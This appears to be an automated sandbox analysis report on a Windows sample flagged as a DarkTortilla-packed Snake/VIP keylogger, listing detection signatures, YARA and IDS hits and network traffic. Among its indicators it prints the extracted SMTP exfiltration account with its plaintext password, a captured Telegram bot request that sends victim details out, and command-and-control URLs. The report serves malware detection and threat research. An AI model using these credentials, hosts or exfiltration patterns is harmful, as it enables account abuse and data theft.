Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sS7Jrsk0Z7.exe

Overview

General Information

Sample name:sS7Jrsk0Z7.exe
renamed because original name is a hash value
Original sample name:399908f6dc7e0dcad418f2cadd782f26f66adfdf1e523725dbc14713033c44a7.exe
Analysis ID:1588892
MD5:6de308ce9b42f3ca44d87cd354dde9ae
SHA1:6071d1e4f71527bb4e23f0ffce53b30dcb89500b
SHA256:399908f6dc7e0dcad418f2cadd782f26f66adfdf1e523725dbc14713033c44a7
Tags:exeuser-adrian__luca
Infos:

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • sS7Jrsk0Z7.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\sS7Jrsk0Z7.exe" MD5: 6DE308CE9B42F3CA44D87CD354DDE9AE)
    • InstallUtil.exe (PID: 7612 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
    00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2dff0:$a1: get_encryptedPassword
          • 0x2e578:$a2: get_encryptedUsername
          • 0x2dc63:$a3: get_timePasswordChanged
          • 0x2dd7a:$a4: get_passwordField
          • 0x2e006:$a5: set_encryptedPassword
          • 0x30d22:$a6: get_passwords
          • 0x310b6:$a7: get_logins
          • 0x30d0e:$a8: GetOutlookPasswords
          • 0x306c7:$a9: StartKeylogger
          • 0x3100f:$a10: KeyLoggerEventArgs
          • 0x30767:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 26 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.sS7Jrsk0Z7.exe.3c98e40.5.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            1.2.sS7Jrsk0Z7.exe.3d18e60.0.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
              1.2.sS7Jrsk0Z7.exe.3c98e40.5.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                1.2.sS7Jrsk0Z7.exe.5070000.6.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  1.2.sS7Jrsk0Z7.exe.3d18e60.0.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                    Click to see the 61 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T06:49:56.699912+010028033053Unknown Traffic192.168.2.749976104.21.64.1443TCP
                    2025-01-11T06:50:00.340945+010028033053Unknown Traffic192.168.2.749983104.21.64.1443TCP
                    2025-01-11T06:50:24.253611+010028033053Unknown Traffic192.168.2.749987104.21.64.1443TCP
                    2025-01-11T06:50:32.505128+010028033053Unknown Traffic192.168.2.749991104.21.64.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T06:49:54.998464+010028032742Potentially Bad Traffic192.168.2.749974158.101.44.24280TCP
                    2025-01-11T06:49:56.108675+010028032742Potentially Bad Traffic192.168.2.749974158.101.44.24280TCP
                    2025-01-11T06:49:57.373425+010028032742Potentially Bad Traffic192.168.2.749978158.101.44.24280TCP
                    2025-01-11T06:49:58.560996+010028032742Potentially Bad Traffic192.168.2.749980158.101.44.24280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T06:50:33.465505+010018100071Potentially Bad Traffic192.168.2.749992149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
                    Multi AV Scanner detection for submitted file
                    Source: sS7Jrsk0Z7.exeReversingLabs: Detection: 75%
                    Source: sS7Jrsk0Z7.exeVirustotal: Detection: 65%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: sS7Jrsk0Z7.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: sS7Jrsk0Z7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49975 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49992 version: TLS 1.2
                    Source: sS7Jrsk0Z7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0123F8E9h10_2_0123F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0123FD41h10_2_0123FA88

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49992 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2012/01/2025%20/%2019:38:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                    Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                    Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49980 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49978 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49974 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49987 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49983 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49976 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49991 -> 104.21.64.1:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49975 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2012/01/2025%20/%2019:38:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 05:50:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://ocsp.digicert.com0A
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://ocsp.digicert.com0C
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://ocsp.digicert.com0X
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20a
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
